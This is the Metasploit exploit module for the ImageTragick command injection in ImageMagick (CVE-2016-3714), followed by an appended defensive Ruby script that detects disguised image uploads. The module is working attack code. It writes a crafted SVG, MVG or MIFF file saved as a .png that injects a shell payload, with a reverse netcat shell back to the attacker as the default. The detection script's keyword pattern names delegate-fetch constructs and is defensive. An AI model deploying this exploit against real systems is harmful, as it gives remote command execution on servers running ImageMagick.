##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ImageMagick Delegate Arbitrary Command Execution',
      'Description'    => %q{
        This module exploits a shell command injection in the way "delegates"
        (commands for converting files) are processed in ImageMagick versions
        <= 7.0.1-0 and <= 6.9.3-9 (legacy).

        Since ImageMagick uses file magic to detect file format, you can create
        a .png (for example) which is actually a crafted SVG (for example) that
        triggers the command injection.

        Tested on Linux, BSD, and OS X. You'll want to choose your payload
        carefully due to portability concerns. Use cmd/unix/generic if need be.
      },
      'Author'         => [
        'stewie',            # Vulnerability discovery
        'Nikolay Ermishkin', # Vulnerability discovery
        'wvu',               # Metasploit module
        'hdm'                # Metasploit module
      ],
      'References'     => [
        %w{CVE 2016-3714},
        %w{URL https://imagetragick.com/},
        %w{URL http://seclists.org/oss-sec/2016/q2/205},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
      ],
      'DisclosureDate' => 'May 3 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        => {
        'BadChars' => "\x22\x27\x5c", # ", ', and \
        'Compat'   => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat bash-tcp'
        }
      },
      # Each target is a template file shipped with the framework; the comment
      # records the ImageMagick command used to derive it from the previous one.
      'Targets'        => [
        ['SVG file',  template: 'msf.svg'],  # convert msf.png msf.svg
        ['MVG file',  template: 'msf.mvg'],  # convert msf.svg msf.mvg
        ['MIFF file', template: 'msf.miff']  # convert -label "" msf.svg msf.miff
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
        'LHOST'                 => Rex::Socket.source_address,
        'DisablePayloadHandler' => false,
        'WfsDelay'              => 9001
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
    ])
  end

  def exploit
    # The SVG template embeds the payload inside XML, so it must be HTML-encoded;
    # the MVG and MIFF templates take it verbatim.
    if target.name == 'SVG file'
      p = Rex::Text.html_encode(payload.encoded)
    else
      p = payload.encoded
    end

    file_create(template.sub('echo vulnerable', p))
  end

  # Reads the chosen target's template from the framework's data directory.
  def template
    File.read(File.join(
      Msf::Config.data_directory,
      'exploits',
      'CVE-2016-3714',
      target[:template]
    ))
  end
end
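The description above depends on ImageMagick deciding the format from the file's magic bytes rather than its name. As an added example (mine, not part of the module or of Metasploit), the Ruby below is a defender-side upload triage check that applies the same header sniffing and rejects a file whose extension and sniffed format disagree, or whose text-format body carries references that hand a filename to a delegate. The keyword list is an assumption based on the coders the ImageTragick advisory recommends disabling in policy.xml (URL, HTTPS, EPHEMERAL, MSL, MVG); the sample MVG is constructed.

```ruby
# Header signatures, compared as raw bytes (.b) so text encodings never interfere.
MAGIC = {
  png:  "\x89PNG\r\n\x1a\n".b,
  jpeg: "\xFF\xD8\xFF".b,
  gif:  "GIF8".b,
  miff: 'id=ImageMagick'.b
}.freeze

EXT_KIND = { '.png' => :png, '.jpg' => :jpeg, '.jpeg' => :jpeg, '.gif' => :gif }.freeze

# What the bytes really are, judged from the header the way ImageMagick does.
# The extension is deliberately ignored here; it is compared separately.
def sniff(bytes)
  head = bytes.b[0, 512]
  MAGIC.each { |kind, sig| return kind if head.start_with?(sig) }
  return :mvg if head.lstrip.start_with?('push graphic-context'.b)
  return :svg if head =~ /\A\s*(<\?xml|<svg|<!DOCTYPE\s+svg)/i
  :unknown
end

# Text constructs that make ImageMagick pass a filename to a delegate command
# (assumed list, see lead-in). A plain xmlns="http://..." is not flagged, since
# every SVG carries one; only href-style fetches and url() fills are.
DELEGATE_REFS = /\b(url\s*\(|ephemeral:|msl:|label:@|text:@|caption:@|href\s*=\s*["']https?:)/i

def delegate_references(bytes)
  bytes.b.scan(DELEGATE_REFS).flatten.map(&:downcase).uniq
end

# One verdict per upload: reject when the claimed type and the sniffed type
# differ, or when a text-based format carries any delegate reference.
def triage(filename, bytes)
  claimed  = EXT_KIND.fetch(File.extname(filename).downcase, :unknown)
  actual   = sniff(bytes)
  refs     = %i[svg mvg miff].include?(actual) ? delegate_references(bytes) : []
  mismatch = claimed != :unknown && claimed != actual
  { claimed: claimed, actual: actual, mismatch: mismatch,
    delegate_refs: refs, reject: mismatch || !refs.empty? }
end

# Constructed sample: an MVG document that would be uploaded under a .png name.
MVG_NAMED_PNG = <<~MVG.b
  push graphic-context
  viewbox 0 0 640 480
  fill 'url(https://example.com/image.jpg)'
  pop graphic-context
MVG

puts triage('msf.png', MVG_NAMED_PNG).inspect if __FILE__ == $PROGRAM_NAME
```

Run it on the constructed sample and the verdict reports `actual: :mvg`, `mismatch: true` and `reject: true`; a genuine PNG under a .png name passes.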